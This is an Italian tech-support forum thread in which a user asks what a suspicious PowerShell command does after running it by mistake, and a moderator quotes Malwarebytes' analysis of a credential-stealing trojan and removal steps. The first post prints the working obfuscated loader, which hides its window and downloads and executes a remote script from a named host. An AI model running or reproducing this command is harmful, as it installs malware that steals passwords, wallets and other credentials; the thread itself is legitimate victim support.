Stringa sospetta...

Pever

Utente Attivo
869
359
Hardware Utente
CPU
i7 8700k
Dissipatore
Cryorig h5 universal
Scheda Madre
Asus Z370-a Prime
Hard Disk
WD Blue 1TB + samsung 970 evo + crucial mx300 250gb
RAM
32gb G.skill
Scheda Video
Gigabyte gtx 950
Scheda Audio
Behringer umc204hd
Alimentatore
Corsair Tx650m
Case
Sharkoon am5 silent
Periferiche
Razer BW/CM quickfire TK + Razer DA elite/g502
Sistema Operativo
Windows 10 + OSX
Salve, qualcuno saprebbe indicarmi che comando esegue questa stringa alquanto sospetta?
Codice:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq
Dopo averla eseguita erroneamente ho fatto la scansione con malwarebytes e non ha trovato nulla, ma non mi fa per nulla sentire più tranquillo :varie13:
 

Robertob89

Moderatore
Staff Forum
4,328
2,366
Hardware Utente
CPU
Ryzen 5 3600 @ 4.2ghz 1.35v
Dissipatore
Custom Loop: wb cpu e gpu EK+HL gts 360/240
Scheda Madre
Asus Prime X470 Pro
Hard Disk
Samsung 960 Evo + Samsung 850 Evo
RAM
16 gb G skill Trident 3200mhz CL16
Scheda Video
Evga 1080TI Sc Black Gaming OC
Monitor
Acer Predator 27" 144hz 1440p IPS
Alimentatore
Evga 650W SuperNova G2
Case
Cooler Master H500M
Sistema Operativo
Win 10 Pro 64 bit
Direttamente dal sito di MalwareBytes:

No signs that it is a virus nor that it was generated by a virus. It is a trojan.
The mini script in the LNK file you provided downloads a file purported to be info.doc but it is a large PowerShell script.
It downloads [ from: dir.k.o.n.pserver.ru (185.118.165.205) using TCP port 4577 ] what is purported to be read.doc but it isn't. It's a malicious executable.

While it is not reflected by Virus Total, the payload, which are trojans, are detected by MBAM.

It has properties associated with the AZORult trojan and it is a data stealing trojan.
It tries to harvest and steal the following which includes, but may not be limited to...

  • Putty / WinSCP information (sessions, passwords, etc)
  • Web Browser information (history, passwords, etc)
  • FTP login credentials
  • Crypto-Currency Wallets
  • Instant Messenger accounts and password credentials
  • Email credentials (via file access)
Link ad una possibile risoluzione: https://forums.malwarebytes.com/topic/248154-malicious-downloaded-link/
Soluzione 2 con caso simile (stessa tipologia di Trojan): https://forums.malwarebytes.com/topic/245566-i-opened-a-malicious-powershell-shortcut/

Te la riporto nello spoiler, prova con questa e la soluzione 2.
Facci sapere!

Please download Sophos Virus Removal Tool and save it to your computer's Desktop.
  • Right-click the icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Next button.
  • Select 'I accept the terms in the license agreement', then click Next twice.
  • Click the Install button and wait until the installation is complete.
  • Click the Finish button. The tool created a shortcut icon on the Desktop of your computer.
  • Now, double-click the Sophos Virus Removal Tool shortcut icon to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • After it updatesand a "Start Scanning" button appears in the lower right:
    • Disconnect from the Internet or physically unplug your Internet cable connection.
    • Close all open programs, scheduling/updating tasks and background processes that might activate during the scan including the screensaver.
    • Temporarily disable your anti-virus and real-time anti-spyware protection.

In breve: si, file sospetto e molto probabilmente a medio-alto rischio.
Hai scaricato e lanciato qualcosa di particolare, recentemente? Da siti possibilmente poco sicuri? Mail o altro?

Nel caso invece così non fosse, attendiamo il parere di qualcuno che abbia avuto più esperienze in merito, che ti potrà seguire meglio.
 

Pever

Utente Attivo
869
359
Hardware Utente
CPU
i7 8700k
Dissipatore
Cryorig h5 universal
Scheda Madre
Asus Z370-a Prime
Hard Disk
WD Blue 1TB + samsung 970 evo + crucial mx300 250gb
RAM
32gb G.skill
Scheda Video
Gigabyte gtx 950
Scheda Audio
Behringer umc204hd
Alimentatore
Corsair Tx650m
Case
Sharkoon am5 silent
Periferiche
Razer BW/CM quickfire TK + Razer DA elite/g502
Sistema Operativo
Windows 10 + OSX
Seguito il "Fix" che hai messo in spoiler, scansionato con sophos, ma non ha trovato nulla...

Egh beh si capisce, avevo scaricato un programmino e come sempre ho fatto scansione della cartella prima di far partire l'eseguibile, quando l'ho avviato e ho fisto la finestra del cmd/powershell flashare ho capito di aver commesso un errore e ho controllato cosa c'era scritto nell'eseguibile...
EDIT: probabilmente era un finto file vlc adesso che ci penso
 
Ultima modifica:

Entra

oppure Accedi utilizzando